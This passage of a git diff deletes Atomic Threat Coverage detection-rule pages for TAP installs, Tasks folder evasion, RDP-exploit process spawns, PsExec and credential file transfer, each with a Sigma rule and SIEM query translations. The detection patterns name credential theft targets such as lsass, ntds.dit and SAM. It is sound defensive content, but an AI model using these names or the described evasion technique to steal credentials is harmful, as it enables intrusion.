-        "subject": "Sigma Rule 'Tap Driver Installation'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:"7045" AND ImagePath.keyword:*tap0901*)
-(EventID:"6" AND ImagePath.keyword:*tap0901*)
-(EventID:"4697" AND ImagePath.keyword:*tap0901*)
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:System" EventCode="7045" ImagePath="*tap0901*")
-(source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="6" ImagePath="*tap0901*")
-(source="WinEventLog:Security" EventCode="4697" ImagePath="*tap0901*")
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" event_id="7045" ImagePath="*tap0901*")
-(event_id="6" ImagePath="*tap0901*")
-(event_source="Microsoft-Windows-Security-Auditing" event_id="4697" ImagePath="*tap0901*")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*7045)(?=.*.*tap0901.*))'
-grep -P '^(?:.*(?=.*6)(?=.*.*tap0901.*))'
-grep -P '^(?:.*(?=.*4697)(?=.*.*tap0901.*))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_tap_installer_execution.md b/Atomic_Threat_Coverage/Detection_Rules/win_tap_installer_execution.md
deleted file mode 100644
index dfcb7b3..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_tap_installer_execution.md
+++ /dev/null
@@ -1,170 +0,0 @@
-| Title                    | Tap Installer Execution       |
-|:-------------------------|:------------------|
-| **Description**          | Well-known TAP software installation. Possible preparation for data exfiltration using tunneling techniques |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0010: Exfiltration](https://attack.mitre.org/tactics/TA0010)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1048: Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0001_4688_windows_process_creation](../Data_Needed/DN0001_4688_windows_process_creation.md)</li><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1048: Exfiltration Over Alternative Protocol](../Triggers/T1048.md)</li></ul>  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>Legitimate OpenVPN TAP insntallation</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           |  There are no documented References for this Detection Rule yet  |
-| **Author**               | Daniil Yugoslavskiy, Ian Davis, oscd.community |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Tap Installer Execution
-id: 99793437-3e16-439b-be0f-078782cf953d
-description: Well-known TAP software installation. Possible preparation for data exfiltration using tunneling techniques
-status: experimental
-author: Daniil Yugoslavskiy, Ian Davis, oscd.community
-date: 2019/10/24
-tags:
-    - attack.exfiltration
-    - attack.t1048
-logsource:
-     category: process_creation
-     product: windows
-detection:
-    selection:
-        Image|endswith: '\tapinstall.exe'
-    condition: selection
-falsepositives:
-    - Legitimate OpenVPN TAP insntallation
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "Image.*.*\\tapinstall.exe") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-winlog.event_data.Image.keyword:*\\tapinstall.exe
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/99793437-3e16-439b-be0f-078782cf953d <<EOF
-{
-  "metadata": {
-    "title": "Tap Installer Execution",
-    "description": "Well-known TAP software installation. Possible preparation for data exfiltration using tunneling techniques",
-    "tags": [
-      "attack.exfiltration",
-      "attack.t1048"
-    ],
-    "query": "winlog.event_data.Image.keyword:*\\\\tapinstall.exe"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "winlog.event_data.Image.keyword:*\\\\tapinstall.exe",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Tap Installer Execution'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-Image.keyword:*\\tapinstall.exe
-```
-
-
-### splunk
-    
-```
-Image="*\\tapinstall.exe"
-```
-
-
-### logpoint
-    
-```
-(event_id="1" Image="*\\tapinstall.exe")
-```
-
-
-### grep
-    
-```
-grep -P '^.*\tapinstall\.exe'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_task_folder_evasion.md b/Atomic_Threat_Coverage/Detection_Rules/win_task_folder_evasion.md
deleted file mode 100644
index 702f4ee..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_task_folder_evasion.md
+++ /dev/null
@@ -1,191 +0,0 @@
-| Title                    | Tasks Folder Evasion       |
-|:-------------------------|:------------------|
-| **Description**          | The Tasks folder in system32 and syswow64 are globally writable paths. Adversaries can take advantage of this and load or influence any script hosts or ANY .NET Application in Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li><li>[TA0003: Persistence](https://attack.mitre.org/tactics/TA0003)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1064: Scripting](https://attack.mitre.org/techniques/T1064)</li><li>[T1211: Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211)</li><li>[T1059: Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://twitter.com/subTee/status/1216465628946563073](https://twitter.com/subTee/status/1216465628946563073)</li><li>[https://gist.github.com/am0nsec/8378da08f848424e4ab0cc5b317fdd26](https://gist.github.com/am0nsec/8378da08f848424e4ab0cc5b317fdd26)</li></ul>  |
-| **Author**               | Sreeman |
-| Other Tags           | <ul><li>attack.t1059.005</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Tasks Folder Evasion
-id: cc4e02ba-9c06-48e2-b09e-2500cace9ae0
-status: experimental
-description: The Tasks folder in system32 and syswow64 are globally writable paths. Adversaries can take advantage of this and load or influence any script hosts or ANY .NET Application in Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr
-references:
-    - https://twitter.com/subTee/status/1216465628946563073
-    - https://gist.github.com/am0nsec/8378da08f848424e4ab0cc5b317fdd26
-date: 2020/01/13
-author: Sreeman
-tags:
-    - attack.t1064
-    - attack.t1211
-    - attack.t1059
-    - attack.defense_evasion
-    - attack.persistence
-    - attack.t1059.005
-logsource:
-    product: Windows
-detection:
-    selection1:
-        CommandLine|contains:
-            - 'echo '
-            - 'copy '
-            - 'type '
-            - 'file createnew'
-    selection2:
-        CommandLine|contains:
-            - ' C:\Windows\System32\Tasks\'
-            - ' C:\Windows\SysWow64\Tasks\'
-    condition: selection1 and selection2
-fields:
-    - CommandLine
-    - ParentProcess
-falsepositives:
-    - Unknown
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent | where {(($_.message -match "CommandLine.*.*echo .*" -or $_.message -match "CommandLine.*.*copy .*" -or $_.message -match "CommandLine.*.*type .*" -or $_.message -match "CommandLine.*.*file createnew.*") -and ($_.message -match "CommandLine.*.* C:\\Windows\\System32\\Tasks\\.*" -or $_.message -match "CommandLine.*.* C:\\Windows\\SysWow64\\Tasks\\.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.CommandLine.keyword:(*echo\ * OR *copy\ * OR *type\ * OR *file\ createnew*) AND winlog.event_data.CommandLine.keyword:(*\ C\:\\Windows\\System32\\Tasks\\* OR *\ C\:\\Windows\\SysWow64\\Tasks\\*))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/cc4e02ba-9c06-48e2-b09e-2500cace9ae0 <<EOF
-{
-  "metadata": {
-    "title": "Tasks Folder Evasion",
-    "description": "The Tasks folder in system32 and syswow64 are globally writable paths. Adversaries can take advantage of this and load or influence any script hosts or ANY .NET Application in Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr",
-    "tags": [
-      "attack.t1064",
-      "attack.t1211",
-      "attack.t1059",
-      "attack.defense_evasion",
-      "attack.persistence",
-      "attack.t1059.005"
-    ],
-    "query": "(winlog.event_data.CommandLine.keyword:(*echo\\ * OR *copy\\ * OR *type\\ * OR *file\\ createnew*) AND winlog.event_data.CommandLine.keyword:(*\\ C\\:\\\\Windows\\\\System32\\\\Tasks\\\\* OR *\\ C\\:\\\\Windows\\\\SysWow64\\\\Tasks\\\\*))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.CommandLine.keyword:(*echo\\ * OR *copy\\ * OR *type\\ * OR *file\\ createnew*) AND winlog.event_data.CommandLine.keyword:(*\\ C\\:\\\\Windows\\\\System32\\\\Tasks\\\\* OR *\\ C\\:\\\\Windows\\\\SysWow64\\\\Tasks\\\\*))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Tasks Folder Evasion'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n  CommandLine = {{_source.CommandLine}}\nParentProcess = {{_source.ParentProcess}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(CommandLine.keyword:(*echo * *copy * *type * *file createnew*) AND CommandLine.keyword:(* C\:\\Windows\\System32\\Tasks\\* * C\:\\Windows\\SysWow64\\Tasks\\*))
-```
-
-
-### splunk
-    
-```
-((CommandLine="*echo *" OR CommandLine="*copy *" OR CommandLine="*type *" OR CommandLine="*file createnew*") (CommandLine="* C:\\Windows\\System32\\Tasks\\*" OR CommandLine="* C:\\Windows\\SysWow64\\Tasks\\*")) | table CommandLine,ParentProcess
-```
-
-
-### logpoint
-    
-```
-(CommandLine IN ["*echo *", "*copy *", "*type *", "*file createnew*"] CommandLine IN ["* C:\\Windows\\System32\\Tasks\\*", "* C:\\Windows\\SysWow64\\Tasks\\*"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*.*echo .*|.*.*copy .*|.*.*type .*|.*.*file createnew.*))(?=.*(?:.*.* C:\Windows\System32\Tasks\\.*|.*.* C:\Windows\SysWow64\Tasks\\.*)))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_termserv_proc_spawn.md b/Atomic_Threat_Coverage/Detection_Rules/win_termserv_proc_spawn.md
deleted file mode 100644
index 5c850b9..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_termserv_proc_spawn.md
+++ /dev/null
@@ -1,173 +0,0 @@
-| Title                    | Terminal Service Process Spawn       |
-|:-------------------------|:------------------|
-| **Description**          | Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708) |
-| **ATT&amp;CK Tactic**    |   This Detection Rule wasn't mapped to ATT&amp;CK Tactic yet  |
-| **ATT&amp;CK Technique** |  This Detection Rule wasn't mapped to ATT&amp;CK Technique yet  |
-| **Data Needed**          | <ul><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/rdp-stands-for-really-do-patch-understanding-the-wormable-rdp-vulnerability-cve-2019-0708/](https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/rdp-stands-for-really-do-patch-understanding-the-wormable-rdp-vulnerability-cve-2019-0708/)</li></ul>  |
-| **Author**               | Florian Roth |
-| Other Tags           | <ul><li>car.2013-07-002</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Terminal Service Process Spawn
-id: 1012f107-b8f1-4271-af30-5aed2de89b39
-status: experimental
-description: Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708)
-references:
-    - https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/rdp-stands-for-really-do-patch-understanding-the-wormable-rdp-vulnerability-cve-2019-0708/
-author: Florian Roth
-date: 2019/05/22
-tags:
-    - car.2013-07-002
-logsource:
-    product: windows
-    category: process_creation
-detection:
-    selection:
-        ParentCommandLine: '*\svchost.exe*termsvcs'
-    filter:
-        Image: '*\rdpclip.exe'
-    condition: selection and not filter
-falsepositives:
-    - Unknown
-level: high
-
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "ParentCommandLine.*.*\\svchost.exe.*termsvcs" -and  -not ($_.message -match "Image.*.*\\rdpclip.exe")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.ParentCommandLine.keyword:*\\svchost.exe*termsvcs AND (NOT (winlog.event_data.Image.keyword:*\\rdpclip.exe)))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/1012f107-b8f1-4271-af30-5aed2de89b39 <<EOF
-{
-  "metadata": {
-    "title": "Terminal Service Process Spawn",
-    "description": "Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708)",
-    "tags": [
-      "car.2013-07-002"
-    ],
-    "query": "(winlog.event_data.ParentCommandLine.keyword:*\\\\svchost.exe*termsvcs AND (NOT (winlog.event_data.Image.keyword:*\\\\rdpclip.exe)))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.ParentCommandLine.keyword:*\\\\svchost.exe*termsvcs AND (NOT (winlog.event_data.Image.keyword:*\\\\rdpclip.exe)))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Terminal Service Process Spawn'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(ParentCommandLine.keyword:*\\svchost.exe*termsvcs AND (NOT (Image.keyword:*\\rdpclip.exe)))
-```
-
-
-### splunk
-    
-```
-(ParentCommandLine="*\\svchost.exe*termsvcs" NOT (Image="*\\rdpclip.exe"))
-```
-
-
-### logpoint
-    
-```
-(event_id="1" ParentCommandLine="*\\svchost.exe*termsvcs"  -(Image="*\\rdpclip.exe"))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*.*\svchost\.exe.*termsvcs)(?=.*(?!.*(?:.*(?=.*.*\rdpclip\.exe)))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_tool_psexec.md b/Atomic_Threat_Coverage/Detection_Rules/win_tool_psexec.md
deleted file mode 100644
index 9e8e4a8..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_tool_psexec.md
+++ /dev/null
@@ -1,279 +0,0 @@
-| Title                    | PsExec Tool Execution       |
-|:-------------------------|:------------------|
-| **Description**          | Detects PsExec service installation and execution events (service and Sysmon) |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1035: Service Execution](https://attack.mitre.org/techniques/T1035)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | low |
-| **False Positives**      | <ul><li>unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://www.jpcert.or.jp/english/pub/sr/ir_research.html](https://www.jpcert.or.jp/english/pub/sr/ir_research.html)</li><li>[https://jpcertcc.github.io/ToolAnalysisResultSheet](https://jpcertcc.github.io/ToolAnalysisResultSheet)</li></ul>  |
-| **Author**               | Thomas Patzke |
-| Other Tags           | <ul><li>attack.s0029</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-action: global
-title: PsExec Tool Execution
-id: 42c575ea-e41e-41f1-b248-8093c3e82a28
-status: experimental
-description: Detects PsExec service installation and execution events (service and Sysmon)
-author: Thomas Patzke
-date: 2017/06/12
-references:
-    - https://www.jpcert.or.jp/english/pub/sr/ir_research.html
-    - https://jpcertcc.github.io/ToolAnalysisResultSheet
-tags:
-    - attack.execution
-    - attack.t1035
-    - attack.s0029
-detection:
-    condition: 1 of them
-fields:
-    - EventID
-    - CommandLine
-    - ParentCommandLine
-    - ServiceName
-    - ServiceFileName
-falsepositives:
-    - unknown
-level: low
----
-logsource:
-    product: windows
-    service: system
-detection:
-    service_installation:
-        EventID: 7045
-        ServiceName: 'PSEXESVC'
-        ServiceFileName: '*\PSEXESVC.exe'
-    service_execution:
-        EventID: 7036
-        ServiceName: 'PSEXESVC'
----
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    sysmon_processcreation:
-        Image: '*\PSEXESVC.exe'
-        User: 'NT AUTHORITY\SYSTEM'
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName System | where {($_.message -match "ServiceName.*PSEXESVC" -and (($_.ID -eq "7045" -and $_.message -match "ServiceFileName.*.*\\PSEXESVC.exe") -or $_.ID -eq "7036")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "Image.*.*\\PSEXESVC.exe" -and $_.message -match "User.*NT AUTHORITY\\SYSTEM") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.ServiceName:"PSEXESVC" AND ((winlog.event_id:"7045" AND winlog.event_data.ServiceFileName.keyword:*\\PSEXESVC.exe) OR winlog.event_id:"7036"))
-(winlog.event_data.Image.keyword:*\\PSEXESVC.exe AND winlog.event_data.User:"NT\ AUTHORITY\\SYSTEM")
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/42c575ea-e41e-41f1-b248-8093c3e82a28 <<EOF
-{
-  "metadata": {
-    "title": "PsExec Tool Execution",
-    "description": "Detects PsExec service installation and execution events (service and Sysmon)",
-    "tags": [
-      "attack.execution",
-      "attack.t1035",
-      "attack.s0029"
-    ],
-    "query": "(winlog.event_data.ServiceName:\"PSEXESVC\" AND ((winlog.event_id:\"7045\" AND winlog.event_data.ServiceFileName.keyword:*\\\\PSEXESVC.exe) OR winlog.event_id:\"7036\"))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.ServiceName:\"PSEXESVC\" AND ((winlog.event_id:\"7045\" AND winlog.event_data.ServiceFileName.keyword:*\\\\PSEXESVC.exe) OR winlog.event_id:\"7036\"))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'PsExec Tool Execution'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n          EventID = {{_source.EventID}}\n      CommandLine = {{_source.CommandLine}}\nParentCommandLine = {{_source.ParentCommandLine}}\n      ServiceName = {{_source.ServiceName}}\n  ServiceFileName = {{_source.ServiceFileName}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/42c575ea-e41e-41f1-b248-8093c3e82a28-2 <<EOF
-{
-  "metadata": {
-    "title": "PsExec Tool Execution",
-    "description": "Detects PsExec service installation and execution events (service and Sysmon)",
-    "tags": [
-      "attack.execution",
-      "attack.t1035",
-      "attack.s0029"
-    ],
-    "query": "(winlog.event_data.Image.keyword:*\\\\PSEXESVC.exe AND winlog.event_data.User:\"NT\\ AUTHORITY\\\\SYSTEM\")"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.Image.keyword:*\\\\PSEXESVC.exe AND winlog.event_data.User:\"NT\\ AUTHORITY\\\\SYSTEM\")",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'PsExec Tool Execution'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n          EventID = {{_source.EventID}}\n      CommandLine = {{_source.CommandLine}}\nParentCommandLine = {{_source.ParentCommandLine}}\n      ServiceName = {{_source.ServiceName}}\n  ServiceFileName = {{_source.ServiceFileName}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(ServiceName:"PSEXESVC" AND ((EventID:"7045" AND ServiceFileName.keyword:*\\PSEXESVC.exe) OR EventID:"7036"))
-(Image.keyword:*\\PSEXESVC.exe AND User:"NT AUTHORITY\\SYSTEM")
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:System" ServiceName="PSEXESVC" ((EventCode="7045" ServiceFileName="*\\PSEXESVC.exe") OR EventCode="7036")) | table EventCode,CommandLine,ParentCommandLine,ServiceName,ServiceFileName
-(Image="*\\PSEXESVC.exe" User="NT AUTHORITY\\SYSTEM") | table EventCode,CommandLine,ParentCommandLine,ServiceName,ServiceFileName
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" service="PSEXESVC" ((event_id="7045" ServiceFileName="*\\PSEXESVC.exe") OR event_id="7036"))
-(event_id="1" Image="*\\PSEXESVC.exe" User="NT AUTHORITY\\SYSTEM")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*PSEXESVC)(?=.*(?:.*(?:.*(?:.*(?=.*7045)(?=.*.*\PSEXESVC\.exe))|.*7036))))'
-grep -P '^(?:.*(?=.*.*\PSEXESVC\.exe)(?=.*NT AUTHORITY\SYSTEM))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_transferring_files_with_credential_data_via_network_shares.md b/Atomic_Threat_Coverage/Detection_Rules/win_transferring_files_with_credential_data_via_network_shares.md
deleted file mode 100644
index db14e51..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_transferring_files_with_credential_data_via_network_shares.md
+++ /dev/null
@@ -1,187 +0,0 @@
-| Title                    | Transfering Files with Credential Data via Network Shares       |
-|:-------------------------|:------------------|
-| **Description**          | Transfering files with well-known filenames (sensitive files with credential data) using network shares |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0006: Credential Access](https://attack.mitre.org/tactics/TA0006)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1003: OS Credential Dumping](https://attack.mitre.org/techniques/T1003)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              | <ul><li>[T1003: OS Credential Dumping](../Triggers/T1003.md)</li></ul>  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>Transfering sensitive files for legitimate administration work by legitimate administrator</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment](https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment)</li></ul>  |
-| **Author**               | Teymur Kheirkhabarov, oscd.community |
-| Other Tags           | <ul><li>attack.t1003.002</li><li>attack.t1003.001</li><li>attack.t1003.003</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Transfering Files with Credential Data via Network Shares
-id: 910ab938-668b-401b-b08c-b596e80fdca5
-description: Transfering files with well-known filenames (sensitive files with credential data) using network shares
-author: Teymur Kheirkhabarov, oscd.community
-date: 2019/10/22
-references:
-    - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment
-tags:
-    - attack.credential_access
-    - attack.t1003
-    - attack.t1003.002
-    - attack.t1003.001
-    - attack.t1003.003
-logsource:
-    product: windows
-    service: security
-detection:
-    selection:
-        EventID: 5145
-        RelativeTargetName|contains:
-            - '\mimidrv'
-            - '\lsass'
-            - '\windows\minidump\'
-            - '\hiberfil'
-            - '\sqldmpr'
-            - '\sam'
-            - '\ntds.dit'
-            - '\security'
-    condition: selection
-falsepositives:
-    - Transfering sensitive files for legitimate administration work by legitimate administrator
-level: medium
-status: experimental
-
-```
-
-
-
-
-
-### powershell
-    
-```
